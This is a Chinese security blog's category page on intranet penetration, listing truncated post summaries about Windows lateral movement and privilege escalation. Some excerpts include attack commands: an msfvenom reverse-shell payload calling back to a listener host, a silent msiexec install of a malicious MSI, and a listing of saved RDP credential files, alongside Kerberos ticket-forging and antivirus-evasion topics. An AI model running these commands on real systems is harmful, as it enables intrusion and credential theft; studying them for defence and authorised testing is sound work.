论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

随笔分类 -  内网渗透

摘要:###IPC利用 概念:共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 作用:利用IPC$连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。 基 阅读全文
posted @ 2020-08-10 14:40 Yangsir34 阅读(640) 评论(0) 推荐(0)

摘要:###查看rdp连接记录: ###前提是目标在RDP连接是勾选了保存凭证: ###查找本地的Credentials : dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* ###获取guidMasterKey: 只要是同一个登录的用户 阅读全文
posted @ 2020-08-05 10:35 Yangsir34 阅读(3015) 评论(0) 推荐(0)

摘要:##本文仅学习使用!!!请遵守《网络安全法》!用于非法目的与本人无关、与本文分享无关! ###相关资源列表 https://mitre-attack.github.io/ mitre 科技机构对攻击技术的总结 wiki https://huntingday.github.io MITRE | ATT 阅读全文
posted @ 2020-08-01 12:47 Yangsir34 阅读(2008) 评论(0) 推荐(2)

摘要:###推荐直接docker,安装版的坑多,容易缺依赖: Github:https://github.com/Veil-Framework/Veil Docker:docker pull mattiasohlsson/veil docker run -it -v /tmp/veil-output:/v 阅读全文
posted @ 2020-07-15 22:47 Yangsir34 阅读(661) 评论(0) 推荐(0)

摘要:简介: INF文件或安装信息文件是Microsoft Windows用于安装软件和驱动程序的纯文本文件。 INF文件最常用于安装硬件组件的设备驱动程序。Windows包含用于创建基于INF的安装的IExpress工具。 INF文件是Windows安装程序API及其后续版本Windows Instal 阅读全文
posted @ 2020-07-15 22:29 Yangsir34 阅读(809) 评论(0) 推荐(0)

摘要:##基本查看 查看端口,得到连接端口为 0xd3d,转换后为 3389: REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber 阅读全文
posted @ 2020-07-15 22:00 Yangsir34 阅读(677) 评论(0) 推荐(0)

摘要:如果计算机的操作系统版本是vista或者更高,在权限不够的情况下,访问系统的磁盘的根目录,windows目录、programfiles目录,以及读写系统登录数据库的程序等操作,都需要经过user account control,用户账户控制的认证才可以进行 需要UAC的授权才能进行的操作:配置Win 阅读全文
posted @ 2020-04-04 17:04 Yangsir34 阅读(1310) 评论(0) 推荐(0)

摘要:注册表修改: 注册表查询: msf利用:生成msi文件 获得一个meterpreter会话,上传msi文件Upload /root/yang1.msi 另一窗口如下监听: 进入window执行msi文件msiexec /quiet /qn /i yang1.msi /quiet=在安装期间禁止向用户 阅读全文
posted @ 2020-04-04 17:01 Yangsir34 阅读(372) 评论(0) 推荐(0)

摘要:预览: 链接: https://www.lanzous.com/iaxp8ij 阅读全文
posted @ 2020-04-02 23:34 Yangsir34 阅读(260) 评论(0) 推荐(0)

摘要:sysvol是活动目录的一个用于存储公共文件服务器副本的共享文件夹,在域中的所有域控之间进行复制。sysvol文件夹是在安装活动目录时候自动创建的,主要用来存放登录脚本、组策略数据及其他域控需要的域信息。sysvol在所有经过身份验证的域用户或者域信任用户具有读权限的活动目录的域范围内共享。整个sy 阅读全文
posted @ 2020-03-14 15:08 Yangsir34 阅读(1029) 评论(0) 推荐(0)

摘要:如果目标系统上安装了sql server ,SqlDumper.exe默认存放c:\ProgramFiles\Microsoft SQL Server\number\Shared,number对应sqlserver版本140 for SQL Server 2017130 for SQL Server 阅读全文
posted @ 2020-03-10 12:05 Yangsir34 阅读(1805) 评论(0) 推荐(0)

摘要:#Security Bulletin #KB #Description #Operating System CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/200 阅读全文
posted @ 2020-03-01 19:46 Yangsir34 阅读(201) 评论(0) 推荐(0)

摘要:#CVE #Description #Kernels CVE-2017-1000367 [Sudo](Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494 [Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE- 阅读全文
posted @ 2020-03-01 19:37 Yangsir34 阅读(305) 评论(0) 推荐(0)

摘要:黄金票据是伪造 TGT,白银票据(Silver Ticket)是伪造 ST(Service Ticket),因为它不想黄金票据一样使用krgtgt账户的hash,而是使用计算机账户的hash进行加密的,所以只能获访问指定的权限。前提条件:域名称、域SID、域服务账户的hash、伪造的用户名(任意用户 阅读全文
posted @ 2020-02-27 23:27 Yangsir34 阅读(452) 评论(0) 推荐(0)

摘要:黄金票据(Golden Ticket)是有效的 TGT(TicketGranting Ticket)票据,是由 kerberos账户(krbtgt)加密的。然而krbtgt仅在域控上才用,意味着你已经拿到了域控,用于域控权限掉后,想再重新获取。因为域控的密码可能更改, 通常 kbrtgt 账户不会有 阅读全文
posted @ 2020-02-26 21:48 Yangsir34 阅读(802) 评论(0) 推荐(0)

摘要:MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得 阅读全文
posted @ 2020-02-23 14:36 Yangsir34 阅读(503) 评论(0) 推荐(0)

摘要:被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/mul 阅读全文
posted @ 2020-02-23 13:05 Yangsir34 阅读(1741) 评论(0) 推荐(0)

摘要:报错如下: [*] Bundler failed to load and returned this error: 'cannot load such file -- bundler/setup'[*] You may need to uninstall or upgrade bundler 解决如 阅读全文
posted @ 2020-02-23 12:56 Yangsir34 阅读(597) 评论(0) 推荐(0)

摘要:整理不易,转载请加原文链接:https://www.cnblogs.com/Yang34/p/12343672.html 补充下msf与数据库连接 结合nmap如下: 发现内网服务 use auxiliary/scanner/http/http_version 发现http服务 use auxili 阅读全文
posted @ 2020-02-21 23:17 Yangsir34 阅读(643) 评论(0) 推荐(0)

摘要:更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。 "360tray.exe": "360安全卫士-实时保护", "360safe.exe": "360安全卫士-主程序", "ZhuDongFangYu.exe": "360安全卫士-主动防御", "360sd.exe": "360杀毒", 阅读全文
posted @ 2019-12-06 11:03 Yangsir34 阅读(840) 评论(0) 推荐(0)